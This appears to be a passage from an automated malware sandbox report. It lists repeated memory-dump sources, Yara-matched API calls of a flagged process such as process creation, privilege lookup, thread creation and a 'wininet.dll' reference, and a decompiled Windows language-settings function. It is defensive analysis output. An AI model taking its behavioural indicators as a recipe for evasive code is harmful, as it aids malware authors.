                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098594
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00093516,?,00093C8F,00093C8F,?,00093516,?,?,?,?,?,00000000,00000000,?), ref: 000984BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFA2,0008CFA2,?,00000000,?,?), ref: 00098660
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D43B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E02368788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				short* _v12;
                                                                                                                                                        				void* _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				char _v36;
                                                                                                                                                        				signed int _v40;
                                                                                                                                                        				char _v44;
                                                                                                                                                        				signed int _v48;
                                                                                                                                                        				signed int _v52;
                                                                                                                                                        				signed int _v56;
                                                                                                                                                        				signed int _v60;
                                                                                                                                                        				char _v68;
                                                                                                                                                        				void* _t216;
                                                                                                                                                        				intOrPtr _t231;
                                                                                                                                                        				short* _t235;
                                                                                                                                                        				intOrPtr _t257;
                                                                                                                                                        				short* _t261;
                                                                                                                                                        				intOrPtr _t284;
                                                                                                                                                        				intOrPtr _t288;
                                                                                                                                                        				void* _t314;
                                                                                                                                                        				signed int _t318;
                                                                                                                                                        				short* _t319;
                                                                                                                                                        				intOrPtr _t321;
                                                                                                                                                        				void* _t328;
                                                                                                                                                        				void* _t329;
                                                                                                                                                        				char* _t332;
                                                                                                                                                        				signed int _t333;
                                                                                                                                                        				signed int* _t334;
                                                                                                                                                        				void* _t335;
                                                                                                                                                        				void* _t338;
                                                                                                                                                        				void* _t339;
                                                                                                                                                        
                                                                                                                                                        				_t328 = __edx;
                                                                                                                                                        				_t322 = __ecx;
                                                                                                                                                        				_t318 = 0;
                                                                                                                                                        				_t334 = _a4;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_v48 = 0;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				_v40 = 0;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v52 = 0;
                                                                                                                                                        				if(_t334 == 0) {
                                                                                                                                                        					_t329 = 0xc000000d;
                                                                                                                                                        					L49:
                                                                                                                                                        					_t334[0x11] = _v56;
                                                                                                                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                        					_t334[0x12] = _v60;
                                                                                                                                                        					_t334[0x13] = _v28;
                                                                                                                                                        					_t334[0x17] = _v20;
                                                                                                                                                        					_t334[0x16] = _v48;
                                                                                                                                                        					_t334[0x18] = _v40;
                                                                                                                                                        					_t334[0x14] = _v32;
                                                                                                                                                        					_t334[0x15] = _v52;
                                                                                                                                                        					return _t329;
                                                                                                                                                        				}
                                                                                                                                                        				_v56 = 0;
                                                                                                                                                        				if(E02368460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                        					_v56 = 1;
                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                        						_t207 = E0234E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                        					}
                                                                                                                                                        					_push(1);
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					E0236718A(_t207);
                                                                                                                                                        					_t335 = _t335 + 4;
                                                                                                                                                        				}
                                                                                                                                                        				_v60 = _v60 | 0xffffffff;
                                                                                                                                                        				if(E02368460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                        					_t333 =  *_v8;
                                                                                                                                                        					_v60 = _t333;
                                                                                                                                                        					_t314 = E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        					_push(_t333);
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					E0236718A(_t314);
                                                                                                                                                        					_t335 = _t335 + 4;
                                                                                                                                                        				}
                                                                                                                                                        				_t216 = E02368460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                        				_t332 = ";";
                                                                                                                                                        				if(_t216 < 0) {
                                                                                                                                                        					L17:
                                                                                                                                                        					if(E02368460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                        						L30:
                                                                                                                                                        						if(E02368460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                        							L46:
                                                                                                                                                        							_t329 = 0;
                                                                                                                                                        							L47:
                                                                                                                                                        							if(_v8 != _t318) {
                                                                                                                                                        								E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        							}
                                                                                                                                                        							if(_v28 != _t318) {
                                                                                                                                                        								if(_v20 != _t318) {
                                                                                                                                                        									E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                        									_v20 = _t318;
                                                                                                                                                        									_v40 = _t318;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							goto L49;
                                                                                                                                                        						}
                                                                                                                                                        						_t231 = _v24;
                                                                                                                                                        						_t322 = _t231 + 4;
                                                                                                                                                        						_push(_t231);
                                                                                                                                                        						_v52 = _t322;
                                                                                                                                                        						E0236718A(_t231);
                                                                                                                                                        						if(_t322 == _t318) {
                                                                                                                                                        							_v32 = _t318;
                                                                                                                                                        						} else {
                                                                                                                                                        							_v32 = E0234E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        						}
                                                                                                                                                        						if(_v32 == _t318) {
                                                                                                                                                        							_v52 = _t318;
                                                                                                                                                        							L58:
                                                                                                                                                        							_t329 = 0xc0000017;
                                                                                                                                                        							goto L47;
                                                                                                                                                        						} else {
                                                                                                                                                        							E02342340(_v32, _v8, _v24);
                                                                                                                                                        							_v16 = _v32;
                                                                                                                                                        							_a4 = _t318;
                                                                                                                                                        							_t235 = E0235E679(_v32, _t332);
                                                                                                                                                        							while(1) {
                                                                                                                                                        								_t319 = _t235;
                                                                                                                                                        								if(_t319 == 0) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								 *_t319 = 0;
                                                                                                                                                        								_t321 = _t319 + 2;
                                                                                                                                                        								E0234E2A8(_t322,  &_v68, _v16);
                                                                                                                                                        								if(E02365553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        									_a4 = _a4 + 1;
                                                                                                                                                        								}
                                                                                                                                                        								_v16 = _t321;
                                                                                                                                                        								_t235 = E0235E679(_t321, _t332);
                                                                                                                                                        								_pop(_t322);
                                                                                                                                                        							}
                                                                                                                                                        							_t236 = _v16;
                                                                                                                                                        							if( *_v16 != _t319) {
                                                                                                                                                        								E0234E2A8(_t322,  &_v68, _t236);
                                                                                                                                                        								if(E02365553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        									_a4 = _a4 + 1;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							if(_a4 == 0) {
                                                                                                                                                        								E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                        								_v52 = _v52 & 0x00000000;
                                                                                                                                                        								_v32 = _v32 & 0x00000000;
                                                                                                                                                        							}
                                                                                                                                                        							if(_v8 != 0) {
                                                                                                                                                        								E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                        							}
                                                                                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                                                                                        							_t318 = 0;
                                                                                                                                                        							goto L46;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t257 = _v24;
                                                                                                                                                        					_t322 = _t257 + 4;
                                                                                                                                                        					_push(_t257);
                                                                                                                                                        					_v40 = _t322;
                                                                                                                                                        					E0236718A(_t257);
                                                                                                                                                        					_t338 = _t335 + 4;
                                                                                                                                                        					if(_t322 == _t318) {
                                                                                                                                                        						_v20 = _t318;
                                                                                                                                                        					} else {
                                                                                                                                                        						_v20 = E0234E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        					}
                                                                                                                                                        					if(_v20 == _t318) {
                                                                                                                                                        						_v40 = _t318;
                                                                                                                                                        						goto L58;
                                                                                                                                                        					} else {
                                                                                                                                                        						E02342340(_v20, _v8, _v24);
                                                                                                                                                        						_v16 = _v20;
                                                                                                                                                        						_a4 = _t318;
                                                                                                                                                        						_t261 = E0235E679(_v20, _t332);
                                                                                                                                                        						_t335 = _t338 + 0x14;
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_v12 = _t261;
                                                                                                                                                        							if(_t261 == _t318) {
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							_v12 = _v12 + 2;
                                                                                                                                                        							 *_v12 = 0;
                                                                                                                                                        							E0234E2A8(_v12,  &_v68, _v16);
                                                                                                                                                        							if(E02365553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        								_a4 = _a4 + 1;
                                                                                                                                                        							}
                                                                                                                                                        							_v16 = _v12;
                                                                                                                                                        							_t261 = E0235E679(_v12, _t332);
                                                                                                                                                        							_pop(_t322);
                                                                                                                                                        						}
                                                                                                                                                        						_t269 = _v16;
                                                                                                                                                        						if( *_v16 != _t318) {
                                                                                                                                                        							E0234E2A8(_t322,  &_v68, _t269);
                                                                                                                                                        							if(E02365553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        								_a4 = _a4 + 1;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						if(_a4 == _t318) {
                                                                                                                                                        							E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                        							_v40 = _t318;
                                                                                                                                                        							_v20 = _t318;
                                                                                                                                                        						}
                                                                                                                                                        						if(_v8 != _t318) {
                                                                                                                                                        							E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _t318;
                                                                                                                                                        						goto L30;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				_t284 = _v24;
                                                                                                                                                        				_t322 = _t284 + 4;
                                                                                                                                                        				_push(_t284);
                                                                                                                                                        				_v48 = _t322;
                                                                                                                                                        				E0236718A(_t284);
                                                                                                                                                        				_t339 = _t335 + 4;
                                                                                                                                                        				if(_t322 == _t318) {
                                                                                                                                                        					_v28 = _t318;
                                                                                                                                                        				} else {
                                                                                                                                                        					_v28 = E0234E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        				}
                                                                                                                                                        				if(_v28 == _t318) {
                                                                                                                                                        					_v48 = _t318;
                                                                                                                                                        					goto L58;
                                                                                                                                                        				} else {
                                                                                                                                                        					E02342340(_v28, _v8, _v24);
                                                                                                                                                        					_v16 = _v28;
                                                                                                                                                        					_a4 = _t318;
                                                                                                                                                        					_t288 = E0235E679(_v28, _t332);
                                                                                                                                                        					_t335 = _t339 + 0x14;
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_v12 = _t288;
                                                                                                                                                        						if(_t288 == _t318) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						_v12 = _v12 + 2;
                                                                                                                                                        						 *_v12 = 0;
                                                                                                                                                        						E0234E2A8(_v12,  &_v68, _v16);
                                                                                                                                                        						if(E02365553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        						_v16 = _v12;
                                                                                                                                                        						_t288 = E0235E679(_v12, _t332);
                                                                                                                                                        						_pop(_t322);
                                                                                                                                                        					}
                                                                                                                                                        					_t296 = _v16;
                                                                                                                                                        					if( *_v16 != _t318) {
                                                                                                                                                        						E0234E2A8(_t322,  &_v68, _t296);
                                                                                                                                                        						if(E02365553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					if(_a4 == _t318) {
                                                                                                                                                        						E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                        						_v48 = _t318;
                                                                                                                                                        						_v28 = _t318;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v8 != _t318) {
                                                                                                                                                        						E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        					}
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					goto L17;
                                                                                                                                                        				}
                                                                                                                                                        			}





































                                                                                                                                                        0x02368b46
                                                                                                                                                        0x023687c6
                                                                                                                                                        0x023687d0
                                                                                                                                                        0x023b1ae0
                                                                                                                                                        0x023b1ae6
                                                                                                                                                        0x023b1af8
                                                                                                                                                        0x023b1af8
                                                                                                                                                        0x023b1afd
                                                                                                                                                        0x023b1afe
                                                                                                                                                        0x023b1b01
                                                                                                                                                        0x023b1b06
                                                                                                                                                        0x023b1b06
                                                                                                                                                        0x023687d6
                                                                                                                                                        0x023687f2
                                                                                                                                                        0x023687f7
                                                                                                                                                        0x02368807
                                                                                                                                                        0x0236880a
                                                                                                                                                        0x0236880f
                                                                                                                                                        0x02368810
                                                                                                                                                        0x02368813
                                                                                                                                                        0x02368818
                                                                                                                                                        0x02368818
                                                                                                                                                        0x0236882c
                                                                                                                                                        0x02368831
                                                                                                                                                        0x02368838
                                                                                                                                                        0x02368908
                                                                                                                                                        0x02368920
                                                                                                                                                        0x023689f0
                                                                                                                                                        0x02368a08
                                                                                                                                                        0x02368af6
                                                                                                                                                        0x02368af6
                                                                                                                                                        0x02368af8
                                                                                                                                                        0x02368afb
                                                                                                                                                        0x023b1beb
                                                                                                                                                        0x023b1beb
                                                                                                                                                        0x02368b04
